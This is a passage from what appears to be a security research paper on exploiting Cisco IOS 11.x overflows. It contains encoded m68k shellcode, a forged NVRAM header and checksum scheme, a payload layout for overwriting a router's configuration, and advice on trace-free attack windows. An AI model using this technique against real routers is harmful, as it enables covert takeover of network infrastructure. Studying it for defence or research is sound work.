"/x93/x29/xF2/xD5"              //movew #9984,%sr (0x020F2A70)

"/xF5/xA9/xDA/x25/xD5/xD5"      //moveal #267386880,%a0 (0x020F2A74)

"/xFB/x85"                      //moveal %[email protected],%sp (0x020F2A7A)

"/xF5/xA9/xDA/x25/xD5/xD1"      //moveal #267386884,%a0 (0x020F2A7C)

"/xF5/x85"                      //moveal %[email protected],%a0 (0x020F2A82)

"/x9B/x05"                      //jmp %[email protected] (0x020F2A84)

Finally, there is only one more thing to do before we can compile this all

together: new have to create the new NVRAM header and calculate the

checksum for our new config. The NVRAM header has the form of:

typedef struct {

    u_int16_t       magic;  // 0xABCD

    u_int16_t       one; // Probably type (1=ACII, 2=gz)

    u_int16_t       checksum;

    u_int16_t       IOSver;

    u_int32_t       unknown; // 0x00000014

    u_int32_t       cfg_end; // pointer to first free byte in

// memory after config

    u_int32_t       size;

} nvhdr_t;

Obviously, most values in here are self-explainory. This header is not

nearly as much tested as the memory structures, so IOS will forgive you

strange values in the cfg_end entry and such. You can choose the IOS

version, but yours truly recommends to use something along the lines of

0x0B03 (11.3), just to make sure it works. The size field covers only the

real config text - not the header.

The checksum is calculated over the whole thing (header plus config) with

the checksum field itself being set to zero. This is a standard one's

complement checksum as you find in any IP implementation.

When putting it all together, you should have something along the lines of:

+--------------+

| AAAAAAAAAAAA |

...

| AAAAAAAAAAAA |

+--------------+

| FAKE BLOCK   |

|              |

....

+--------------+

| Bootstrap    |

|              |

....

+--------------+

| config_copy  |

|   XOR pat    |

....

+--------------+

| NVRAM header |

| + config     |

|   XOR pat    |

....

+--------------+

...which you can now send to the Cisco router for execution. If everything

works the way it is planned, the router will seemingly freeze for some

time, because it's working the slow loops for NVRAM copy and does not allow

interrupts, and should then reboot clean and nice.

To save space for better papers, the full code is not included here but is

available at http://www.phenoelit.de/ultimaratio/UltimaRatioVegas.c . It

supports some adjustments for code offset, NOPs where needed and a slightly

different fake block for 11.1 series IOS.

--[ 6 - Everything not covered in 1-5

A few assorted remarks that somehow did not fit into the rest of this text

should be made, so they are made here.

First of all, if you find or know an overflow vulnerability for IOS 11.x

and you think that it is not worth all the trouble to exploit since

everyone should run 12.x by now, let me challange this. Nobody with some

experience on Cisco IOS will run the latest version. It just doesn't work

correctly. Additionally, many people don't update their routers anyway. But

the most interesting part is a thing called "Helper Image" or simply "boot

IOS". This is a mini-IOS loaded right after the ROM monitor, which is

normally a 11.x. On the smaller routers, it's a ROM image and can not be

updated easily. For the bigger ones, people assured me that there are no

12.x mini-IOSes out there they would put on a major production router. Now,

when the Cisco boot up and starts the mini-IOS, it will read the config and

work accordingly as long as the feature is supported. Many are - including

the TFTP server. This gives an attacker a 3-8 seconds time window in which

he can perform an overflow on the IOS, in case somone reloads the router.

In case this goes wrong, the full-blown IOS still starts up, so there will

be no traces of any hostile activity.

The second item yours truly would like to point out are the different

things one might want to explore for overflow attacks. The obvious one

(used in this paper as example) is a service running on a Cisco router.

Another point for overflowing stuff are protocols. No protocol inspection

engine is perfect AFAYTK. So even if the IOS is just supposed to route

the packet, but has to inspect the contents for some reason, you might find

something there. And if all fails, there are still the debug based

overflows. IOS offers a waste amount of debug commands for next to

everything. These do normally display a lot of information comming right

from the packet they received and don't always check the buffer they use

for compiling the displayed string. Unfortunately, it requires someone to

turn on debugging in the first place - but well, this might happen.

And finally, some greets have to be in here. Those go to the following

people in no particular order: Gaus of Cisco PSIRT, Nico of Securite.org,

Dan of DoxPara.com, Halvar Flake, the three anonymous CCIEs/Cisco wizards

yours truly keeps asking strange questions and of course FtR and Mr. V.H.,

because without their equipment, there wouldn't be any research to speak

of. Additional greets go to all people who research Cisco stuff and to whom

yours truly had no chance to talk to so far - please get in touch with us.

The last one goes to the vulnerability research labs out there: let me

know if you need any help reproducing this `;-7

--[ A - References

[1] anonymous <[email protected]>

    "Once upon a free()..."

    Phrack Magazine, Volume 0x0b, Issue 0x39, Phile #0x09 of 0x12

[2] Cisco Router IOS Memory Maps

    http://www.cisco.com/warp/public/112/appB.html

[3] GNU binutils

    http://www.gnu.org/software/binutils/binutils.html

[4] Motorola QUICC 68360 CPU Manual

    MC68360UM, Page 6-70

|=[ EOF ]=---------------------------------------------------------------=|